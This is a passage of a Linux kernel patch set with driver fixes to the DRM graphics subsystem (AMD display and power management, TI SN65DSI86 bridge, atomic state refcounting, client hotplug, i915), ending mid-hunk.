+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 5b251d0094678..97b033dfe9e45 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -2330,7 +2330,7 @@ const struct amd_ip_funcs sdma_v4_0_ip_funcs = {
+ 
+ static const struct amdgpu_ring_funcs sdma_v4_0_ring_funcs = {
+ 	.type = AMDGPU_RING_TYPE_SDMA,
+-	.align_mask = 0xf,
++	.align_mask = 0xff,
+ 	.nop = SDMA_PKT_NOP_HEADER_OP(SDMA_OP_NOP),
+ 	.support_64bit_ptrs = true,
+ 	.secure_submission_supported = true,
+@@ -2400,7 +2400,7 @@ static const struct amdgpu_ring_funcs sdma_v4_0_ring_funcs_2nd_mmhub = {
+ 
+ static const struct amdgpu_ring_funcs sdma_v4_0_page_ring_funcs = {
+ 	.type = AMDGPU_RING_TYPE_SDMA,
+-	.align_mask = 0xf,
++	.align_mask = 0xff,
+ 	.nop = SDMA_PKT_NOP_HEADER_OP(SDMA_OP_NOP),
+ 	.support_64bit_ptrs = true,
+ 	.secure_submission_supported = true,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9be3769d68a85..b854eec2787e2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6972,7 +6972,13 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		amdgpu_dm_connector_add_common_modes(encoder, connector);
++		/* most eDP supports only timings from its edid,
++		 * usually only detailed timings are available
++		 * from eDP edid. timings which are not from edid
++		 * may damage eDP
++		 */
++		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
++			amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 0329e548134b2..db7744beed5fd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -42,6 +42,30 @@
+ #include "dm_helpers.h"
+ #include "ddc_service_types.h"
+ 
++static u32 edid_extract_panel_id(struct edid *edid)
++{
++	return (u32)edid->mfg_id[0] << 24   |
++	       (u32)edid->mfg_id[1] << 16   |
++	       (u32)EDID_PRODUCT_ID(edid);
++}
++
++static void apply_edid_quirks(struct edid *edid, struct dc_edid_caps *edid_caps)
++{
++	uint32_t panel_id = edid_extract_panel_id(edid);
++
++	switch (panel_id) {
++	/* Workaround for some monitors which does not work well with FAMS */
++	case drm_edid_encode_panel_id('S', 'A', 'M', 0x0E5E):
++	case drm_edid_encode_panel_id('S', 'A', 'M', 0x7053):
++	case drm_edid_encode_panel_id('S', 'A', 'M', 0x71AC):
++		DRM_DEBUG_DRIVER("Disabling FAMS on monitor with panel id %X\n", panel_id);
++		edid_caps->panel_patch.disable_fams = true;
++		break;
++	default:
++		return;
++	}
++}
++
+ /* dm_helpers_parse_edid_caps
+  *
+  * Parse edid caps
+@@ -113,6 +137,8 @@ enum dc_edid_status dm_helpers_parse_edid_caps(
+ 	else
+ 		edid_caps->speaker_flags = DEFAULT_SPEAKER_LOCATION;
+ 
++	apply_edid_quirks(edid_buf, edid_caps);
++
+ 	kfree(sads);
+ 	kfree(sadb);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index b405f2e86927d..cca0143444164 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1539,6 +1539,9 @@ bool dc_validate_boot_timing(const struct dc *dc,
+ 		return false;
+ 	}
+ 
++	if (dc->debug.force_odm_combine)
++		return false;
++
+ 	/* Check for enabled DIG to identify enabled display */
+ 	if (!link->link_enc->funcs->is_dig_enabled(link->link_enc))
+ 		return false;
+diff --git a/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c b/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c
+index e179e80667d1c..19d7cfa53211b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c
+@@ -970,10 +970,12 @@ enum dc_status resource_map_phy_clock_resources(
+ 		|| dc_is_virtual_signal(pipe_ctx->stream->signal))
+ 		pipe_ctx->clock_source =
+ 				dc->res_pool->dp_clock_source;
+-	else
+-		pipe_ctx->clock_source = find_matching_pll(
+-			&context->res_ctx, dc->res_pool,
+-			stream);
++	else {
++		if (stream && stream->link && stream->link->link_enc)
++			pipe_ctx->clock_source = find_matching_pll(
++				&context->res_ctx, dc->res_pool,
++				stream);
++	}
+ 
+ 	if (pipe_ctx->clock_source == NULL)
+ 		return DC_NO_CLOCK_SOURCE_RESOURCE;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 2d49e99a152c4..622efa556e7ad 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1678,6 +1678,17 @@ static void dcn20_program_pipe(
+ 
+ 		if (hws->funcs.setup_vupdate_interrupt)
+ 			hws->funcs.setup_vupdate_interrupt(dc, pipe_ctx);
++
++		if (hws->funcs.calculate_dccg_k1_k2_values && dc->res_pool->dccg->funcs->set_pixel_rate_div) {
++			unsigned int k1_div, k2_div;
++
++			hws->funcs.calculate_dccg_k1_k2_values(pipe_ctx, &k1_div, &k2_div);
++
++			dc->res_pool->dccg->funcs->set_pixel_rate_div(
++				dc->res_pool->dccg,
++				pipe_ctx->stream_res.tg->inst,
++				k1_div, k2_div);
++		}
+ 	}
+ 
+ 	if (pipe_ctx->update_flags.bits.odm)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 2f4afe40f3e68..f5fa7abd97fc7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1165,10 +1165,6 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 	unsigned int odm_combine_factor = 0;
+ 	bool two_pix_per_container = false;
+ 
+-	// For phantom pipes, use the same programming as the main pipes
+-	if (pipe_ctx->stream->mall_stream_config.type == SUBVP_PHANTOM) {
+-		stream = pipe_ctx->stream->mall_stream_config.paired_stream;
+-	}
+ 	two_pix_per_container = optc2_is_two_pixels_per_containter(&stream->timing);
+ 	odm_combine_factor = get_odm_config(pipe_ctx, NULL);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+index 2b33eeb213e2a..fe941b103de81 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+@@ -98,7 +98,7 @@ static void optc32_set_odm_combine(struct timing_generator *optc, int *opp_id, i
+ 	optc1->opp_count = opp_cnt;
+ }
+ 
+-static void optc32_set_h_timing_div_manual_mode(struct timing_generator *optc, bool manual_mode)
++void optc32_set_h_timing_div_manual_mode(struct timing_generator *optc, bool manual_mode)
+ {
+ 	struct optc *optc1 = DCN10TG_FROM_TG(optc);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h
+index 5e57c39235fab..e5c5343e56404 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h
+@@ -250,5 +250,6 @@
+ 	SF(OTG0_OTG_DRR_CONTROL, OTG_V_TOTAL_LAST_USED_BY_DRR, mask_sh)
+ 
+ void dcn32_timing_generator_init(struct optc *optc1);
++void optc32_set_h_timing_div_manual_mode(struct timing_generator *optc, bool manual_mode);
+ 
+ #endif /* __DC_OPTC_DCN32_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index eb5b7eb292ef3..b53468aca4a9b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -471,7 +471,7 @@ struct dmub_notification {
+  * of a firmware to know if feature or functionality is supported or present.
+  */
+ #define DMUB_FW_VERSION(major, minor, revision) \
+-	((((major) & 0xFF) << 24) | (((minor) & 0xFF) << 16) | ((revision) & 0xFFFF))
++	((((major) & 0xFF) << 24) | (((minor) & 0xFF) << 16) | (((revision) & 0xFF) << 8))
+ 
+ /**
+  * dmub_srv_create() - creates the DMUB service.
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index 44bbf17e4bef1..3bc4128a22ac2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -168,6 +168,7 @@ struct smu_temperature_range {
+ 	int mem_crit_max;
+ 	int mem_emergency_max;
+ 	int software_shutdown_temp;
++	int software_shutdown_temp_offset;
+ };
+ 
+ struct smu_state_validation_block {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index bffa6247c3cda..d6479a8088554 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -297,5 +297,9 @@ int smu_v13_0_get_pptable_from_firmware(struct smu_context *smu,
+ 					uint32_t *size,
+ 					uint32_t pptable_id);
+ 
++int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
++				     uint32_t pcie_gen_cap,
++				     uint32_t pcie_width_cap);
++
+ #endif
+ #endif
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 5143b4df2cc14..2456f2a72defc 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1381,6 +1381,7 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 	 */
+ 	uint32_t ctxid = entry->src_data[0];
+ 	uint32_t data;
++	uint32_t high;
+ 
+ 	if (client_id == SOC15_IH_CLIENTID_THM) {
+ 		switch (src_id) {
+@@ -1437,6 +1438,36 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 					schedule_work(&smu->throttling_logging_work);
+ 
+ 				break;
++			case 0x8:
++				high = smu->thermal_range.software_shutdown_temp +
++					smu->thermal_range.software_shutdown_temp_offset;
++				high = min_t(typeof(high),
++					     SMU_THERMAL_MAXIMUM_ALERT_TEMP,
++					     high);
++				dev_emerg(adev->dev, "Reduce soft CTF limit to %d (by an offset %d)\n",
++							high,
++							smu->thermal_range.software_shutdown_temp_offset);
++
++				data = RREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL);
++				data = REG_SET_FIELD(data, THM_THERMAL_INT_CTRL,
++							DIG_THERM_INTH,
++							(high & 0xff));
++				data = data & (~THM_THERMAL_INT_CTRL__THERM_TRIGGER_MASK_MASK);
++				WREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL, data);
++				break;
++			case 0x9:
++				high = min_t(typeof(high),
++					     SMU_THERMAL_MAXIMUM_ALERT_TEMP,
++					     smu->thermal_range.software_shutdown_temp);
++				dev_emerg(adev->dev, "Recover soft CTF limit to %d\n", high);
++
++				data = RREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL);
++				data = REG_SET_FIELD(data, THM_THERMAL_INT_CTRL,
++							DIG_THERM_INTH,
++							(high & 0xff));
++				data = data & (~THM_THERMAL_INT_CTRL__THERM_TRIGGER_MASK_MASK);
++				WREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL, data);
++				break;
+ 			}
+ 		}
+ 	}
+@@ -2458,3 +2489,70 @@ int smu_v13_0_mode1_reset(struct smu_context *smu)
+ 
+ 	return ret;
+ }
++
++/*
++ * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
++ * speed switching. Until we have confirmation from Intel that a specific host
++ * supports it, it's safer that we keep it disabled for all.
++ *
++ * https://edc.intel.com/content/www/us/en/design/products/platforms/details/raptor-lake-s/13th-generation-core-processors-datasheet-volume-1-of-2/005/pci-express-support/
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2663
++ */
++static bool smu_v13_0_is_pcie_dynamic_switching_supported(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	if (c->x86_vendor == X86_VENDOR_INTEL)
++		return false;
++#endif
++	return true;
++}
++
++int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
++				     uint32_t pcie_gen_cap,
++				     uint32_t pcie_width_cap)
++{
++	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
++	struct smu_13_0_pcie_table *pcie_table =
++				&dpm_context->dpm_tables.pcie_table;
++	int num_of_levels = pcie_table->num_of_link_levels;
++	uint32_t smu_pcie_arg;
++	int ret, i;
++
++	if (!smu_v13_0_is_pcie_dynamic_switching_supported()) {
++		if (pcie_table->pcie_gen[num_of_levels - 1] < pcie_gen_cap)
++			pcie_gen_cap = pcie_table->pcie_gen[num_of_levels - 1];
++
++		if (pcie_table->pcie_lane[num_of_levels - 1] < pcie_width_cap)
++			pcie_width_cap = pcie_table->pcie_lane[num_of_levels - 1];
++
++		/* Force all levels to use the same settings */
++		for (i = 0; i < num_of_levels; i++) {
++			pcie_table->pcie_gen[i] = pcie_gen_cap;
++			pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
++	} else {
++		for (i = 0; i < num_of_levels; i++) {
++			if (pcie_table->pcie_gen[i] > pcie_gen_cap)
++				pcie_table->pcie_gen[i] = pcie_gen_cap;
++			if (pcie_table->pcie_lane[i] > pcie_width_cap)
++				pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
++	}
++
++	for (i = 0; i < num_of_levels; i++) {
++		smu_pcie_arg = i << 16;
++		smu_pcie_arg |= pcie_table->pcie_gen[i] << 8;
++		smu_pcie_arg |= pcie_table->pcie_lane[i];
++
++		ret = smu_cmn_send_smc_msg_with_param(smu,
++						      SMU_MSG_OverridePcieParameters,
++						      smu_pcie_arg,
++						      NULL);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
++}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 54fc42dad7755..f7ac488a3da20 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1216,37 +1216,6 @@ static int smu_v13_0_0_force_clk_levels(struct smu_context *smu,
+ 	return ret;
+ }
+ 
+-static int smu_v13_0_0_update_pcie_parameters(struct smu_context *smu,
+-					      uint32_t pcie_gen_cap,
+-					      uint32_t pcie_width_cap)
+-{
+-	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+-	struct smu_13_0_pcie_table *pcie_table =
+-				&dpm_context->dpm_tables.pcie_table;
+-	uint32_t smu_pcie_arg;
+-	int ret, i;
+-
+-	for (i = 0; i < pcie_table->num_of_link_levels; i++) {
+-		if (pcie_table->pcie_gen[i] > pcie_gen_cap)
+-			pcie_table->pcie_gen[i] = pcie_gen_cap;
+-		if (pcie_table->pcie_lane[i] > pcie_width_cap)
+-			pcie_table->pcie_lane[i] = pcie_width_cap;
+-
+-		smu_pcie_arg = i << 16;
+-		smu_pcie_arg |= pcie_table->pcie_gen[i] << 8;
+-		smu_pcie_arg |= pcie_table->pcie_lane[i];
+-
+-		ret = smu_cmn_send_smc_msg_with_param(smu,
+-						      SMU_MSG_OverridePcieParameters,
+-						      smu_pcie_arg,
+-						      NULL);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+ static const struct smu_temperature_range smu13_thermal_policy[] = {
+ 	{-273150,  99000, 99000, -273150, 99000, 99000, -273150, 99000, 99000},
+ 	{ 120000, 120000, 120000, 120000, 120000, 120000, 120000, 120000, 120000},
+@@ -1281,6 +1250,7 @@ static int smu_v13_0_0_get_thermal_temperature_range(struct smu_context *smu,
+ 	range->mem_emergency_max = (pptable->SkuTable.TemperatureLimit[TEMP_MEM] + CTF_OFFSET_MEM)*
+ 		SMU_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	range->software_shutdown_temp = powerplay_table->software_shutdown_temp;
++	range->software_shutdown_temp_offset = pptable->SkuTable.FanAbnormalTempLimitOffset;
+ 
+ 	return 0;
+ }
+@@ -2032,7 +2002,7 @@ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+ 	.print_clk_levels = smu_v13_0_0_print_clk_levels,
+ 	.force_clk_levels = smu_v13_0_0_force_clk_levels,
+-	.update_pcie_parameters = smu_v13_0_0_update_pcie_parameters,
++	.update_pcie_parameters = smu_v13_0_update_pcie_parameters,
+ 	.get_thermal_temperature_range = smu_v13_0_0_get_thermal_temperature_range,
+ 	.register_irq_handler = smu_v13_0_register_irq_handler,
+ 	.enable_thermal_alert = smu_v13_0_enable_thermal_alert,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index bd61518bb7b12..d980eff2b6166 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -1225,37 +1225,6 @@ static int smu_v13_0_7_force_clk_levels(struct smu_context *smu,
+ 	return ret;
+ }
+ 
+-static int smu_v13_0_7_update_pcie_parameters(struct smu_context *smu,
+-					      uint32_t pcie_gen_cap,
+-					      uint32_t pcie_width_cap)
+-{
+-	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+-	struct smu_13_0_pcie_table *pcie_table =
+-				&dpm_context->dpm_tables.pcie_table;
+-	uint32_t smu_pcie_arg;
+-	int ret, i;
+-
+-	for (i = 0; i < pcie_table->num_of_link_levels; i++) {
+-		if (pcie_table->pcie_gen[i] > pcie_gen_cap)
+-			pcie_table->pcie_gen[i] = pcie_gen_cap;
+-		if (pcie_table->pcie_lane[i] > pcie_width_cap)
+-			pcie_table->pcie_lane[i] = pcie_width_cap;
+-
+-		smu_pcie_arg = i << 16;
+-		smu_pcie_arg |= pcie_table->pcie_gen[i] << 8;
+-		smu_pcie_arg |= pcie_table->pcie_lane[i];
+-
+-		ret = smu_cmn_send_smc_msg_with_param(smu,
+-						      SMU_MSG_OverridePcieParameters,
+-						      smu_pcie_arg,
+-						      NULL);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+ static const struct smu_temperature_range smu13_thermal_policy[] =
+ {
+ 	{-273150,  99000, 99000, -273150, 99000, 99000, -273150, 99000, 99000},
+@@ -1288,6 +1257,7 @@ static int smu_v13_0_7_get_thermal_temperature_range(struct smu_context *smu,
+ 	range->mem_emergency_max = (pptable->SkuTable.TemperatureLimit[TEMP_MEM] + CTF_OFFSET_MEM)*
+ 		SMU_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	range->software_shutdown_temp = powerplay_table->software_shutdown_temp;
++	range->software_shutdown_temp_offset = pptable->SkuTable.FanAbnormalTempLimitOffset;
+ 
+ 	return 0;
+ }
+@@ -1749,7 +1719,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+ 	.print_clk_levels = smu_v13_0_7_print_clk_levels,
+ 	.force_clk_levels = smu_v13_0_7_force_clk_levels,
+-	.update_pcie_parameters = smu_v13_0_7_update_pcie_parameters,
++	.update_pcie_parameters = smu_v13_0_update_pcie_parameters,
+ 	.get_thermal_temperature_range = smu_v13_0_7_get_thermal_temperature_range,
+ 	.register_irq_handler = smu_v13_0_register_irq_handler,
+ 	.enable_thermal_alert = smu_v13_0_enable_thermal_alert,
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index d16775c973c4e..b89f7f7ca1885 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -170,10 +170,10 @@
+  * @pwm_refclk_freq: Cache for the reference clock input to the PWM.
+  */
+ struct ti_sn65dsi86 {
+-	struct auxiliary_device		bridge_aux;
+-	struct auxiliary_device		gpio_aux;
+-	struct auxiliary_device		aux_aux;
+-	struct auxiliary_device		pwm_aux;
++	struct auxiliary_device		*bridge_aux;
++	struct auxiliary_device		*gpio_aux;
++	struct auxiliary_device		*aux_aux;
++	struct auxiliary_device		*pwm_aux;
+ 
+ 	struct device			*dev;
+ 	struct regmap			*regmap;
+@@ -468,27 +468,34 @@ static void ti_sn65dsi86_delete_aux(void *data)
+ 	auxiliary_device_delete(data);
+ }
+ 
+-/*
+- * AUX bus docs say that a non-NULL release is mandatory, but it makes no
+- * sense for the model used here where all of the aux devices are allocated
+- * in the single shared structure. We'll use this noop as a workaround.
+- */
+-static void ti_sn65dsi86_noop(struct device *dev) {}
++static void ti_sn65dsi86_aux_device_release(struct device *dev)
++{
++	struct auxiliary_device *aux = container_of(dev, struct auxiliary_device, dev);
++
++	kfree(aux);
++}
+ 
+ static int ti_sn65dsi86_add_aux_device(struct ti_sn65dsi86 *pdata,
+-				       struct auxiliary_device *aux,
++				       struct auxiliary_device **aux_out,
+ 				       const char *name)
+ {
+ 	struct device *dev = pdata->dev;
++	struct auxiliary_device *aux;
+ 	int ret;
+ 
++	aux = kzalloc(sizeof(*aux), GFP_KERNEL);
++	if (!aux)
++		return -ENOMEM;
++
+ 	aux->name = name;
+ 	aux->dev.parent = dev;
+-	aux->dev.release = ti_sn65dsi86_noop;
++	aux->dev.release = ti_sn65dsi86_aux_device_release;
+ 	device_set_of_node_from_dev(&aux->dev, dev);
+ 	ret = auxiliary_device_init(aux);
+-	if (ret)
++	if (ret) {
++		kfree(aux);
+ 		return ret;
++	}
+ 	ret = devm_add_action_or_reset(dev, ti_sn65dsi86_uninit_aux, aux);
+ 	if (ret)
+ 		return ret;
+@@ -497,6 +504,8 @@ static int ti_sn65dsi86_add_aux_device(struct ti_sn65dsi86 *pdata,
+ 	if (ret)
+ 		return ret;
+ 	ret = devm_add_action_or_reset(dev, ti_sn65dsi86_delete_aux, aux);
++	if (!ret)
++		*aux_out = aux;
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/drm_atomic.c b/drivers/gpu/drm/drm_atomic.c
+index c0dc5858a7237..7115898258afb 100644
+--- a/drivers/gpu/drm/drm_atomic.c
++++ b/drivers/gpu/drm/drm_atomic.c
+@@ -140,6 +140,12 @@ drm_atomic_state_init(struct drm_device *dev, struct drm_atomic_state *state)
+ 	if (!state->planes)
+ 		goto fail;
+ 
++	/*
++	 * Because drm_atomic_state can be committed asynchronously we need our
++	 * own reference and cannot rely on the on implied by drm_file in the
++	 * ioctl call.
++	 */
++	drm_dev_get(dev);
+ 	state->dev = dev;
+ 
+ 	drm_dbg_atomic(dev, "Allocated atomic state %p\n", state);
+@@ -299,7 +305,8 @@ EXPORT_SYMBOL(drm_atomic_state_clear);
+ void __drm_atomic_state_free(struct kref *ref)
+ {
+ 	struct drm_atomic_state *state = container_of(ref, typeof(*state), ref);
+-	struct drm_mode_config *config = &state->dev->mode_config;
++	struct drm_device *dev = state->dev;
++	struct drm_mode_config *config = &dev->mode_config;
+ 
+ 	drm_atomic_state_clear(state);
+ 
+@@ -311,6 +318,8 @@ void __drm_atomic_state_free(struct kref *ref)
+ 		drm_atomic_state_default_release(state);
+ 		kfree(state);
+ 	}
++
++	drm_dev_put(dev);
+ }
+ EXPORT_SYMBOL(__drm_atomic_state_free);
+ 
+diff --git a/drivers/gpu/drm/drm_atomic_helper.c b/drivers/gpu/drm/drm_atomic_helper.c
+index 02b4a7dc92f5e..202a9990f4517 100644
+--- a/drivers/gpu/drm/drm_atomic_helper.c
++++ b/drivers/gpu/drm/drm_atomic_helper.c
+@@ -1225,7 +1225,16 @@ disable_outputs(struct drm_device *dev, struct drm_atomic_state *old_state)
+ 			continue;
+ 
+ 		ret = drm_crtc_vblank_get(crtc);
+-		WARN_ONCE(ret != -EINVAL, "driver forgot to call drm_crtc_vblank_off()\n");
++		/*
++		 * Self-refresh is not a true "disable"; ensure vblank remains
++		 * enabled.
++		 */
++		if (new_crtc_state->self_refresh_active)
++			WARN_ONCE(ret != 0,
++				  "driver disabled vblank in self-refresh\n");
++		else
++			WARN_ONCE(ret != -EINVAL,
++				  "driver forgot to call drm_crtc_vblank_off()\n");
+ 		if (ret == 0)
+ 			drm_crtc_vblank_put(crtc);
+ 	}
+diff --git a/drivers/gpu/drm/drm_client.c b/drivers/gpu/drm/drm_client.c
+index 2b230b4d69423..dcbeeb68ca641 100644
+--- a/drivers/gpu/drm/drm_client.c
++++ b/drivers/gpu/drm/drm_client.c
+@@ -122,13 +122,34 @@ EXPORT_SYMBOL(drm_client_init);
+  * drm_client_register() it is no longer permissible to call drm_client_release()
+  * directly (outside the unregister callback), instead cleanup will happen
+  * automatically on driver unload.
++ *
++ * Registering a client generates a hotplug event that allows the client
++ * to set up its display from pre-existing outputs. The client must have
++ * initialized its state to able to handle the hotplug event successfully.
+  */
+ void drm_client_register(struct drm_client_dev *client)
+ {
+ 	struct drm_device *dev = client->dev;
++	int ret;
+ 
+ 	mutex_lock(&dev->clientlist_mutex);
+ 	list_add(&client->list, &dev->clientlist);
++
++	if (client->funcs && client->funcs->hotplug) {
++		/*
++		 * Perform an initial hotplug event to pick up the
++		 * display configuration for the client. This step
++		 * has to be performed *after* registering the client
++		 * in the list of clients, or a concurrent hotplug
++		 * event might be lost; leaving the display off.
++		 *
++		 * Hold the clientlist_mutex as for a regular hotplug
++		 * event.
++		 */
++		ret = client->funcs->hotplug(client);
++		if (ret)
++			drm_dbg_kms(dev, "client hotplug ret=%d\n", ret);
++	}
+ 	mutex_unlock(&dev->clientlist_mutex);
+ }
+ EXPORT_SYMBOL(drm_client_register);
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 76e46713b2f0c..442746d9777a4 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -2634,10 +2634,6 @@ void drm_fbdev_generic_setup(struct drm_device *dev,
+ 		preferred_bpp = 32;
+ 	fb_helper->preferred_bpp = preferred_bpp;
+ 
+-	ret = drm_fbdev_client_hotplug(&fb_helper->client);
+-	if (ret)
+-		drm_dbg_kms(dev, "client hotplug ret=%d\n", ret);
+-
+ 	drm_client_register(&fb_helper->client);
+ }
+ EXPORT_SYMBOL(drm_fbdev_generic_setup);
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 455d9ae6c41c9..da9b995b54c8f 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5133,7 +5133,6 @@ copy_bigjoiner_crtc_state_modeset(struct intel_atomic_state *state,
+ 	saved_state->uapi = slave_crtc_state->uapi;
+ 	saved_state->scaler_state = slave_crtc_state->scaler_state;
+ 	saved_state->shared_dpll = slave_crtc_state->shared_dpll;
+-	saved_state->dpll_hw_state = slave_crtc_state->dpll_hw_state;
+ 	saved_state->crc_enabled = slave_crtc_state->crc_enabled;
+ 
+ 	intel_crtc_free_hw_state(slave_crtc_state);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gtt.c b/drivers/gpu/drm/i915/gt/intel_gtt.c
+index 2eaeba14319e9..f4879f437bfa3 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gtt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gtt.c
+@@ -611,7 +611,7 @@ __vm_create_scratch_for_read(struct i915_address_space *vm, unsigned long size)
+ 	if (IS_ERR(obj))
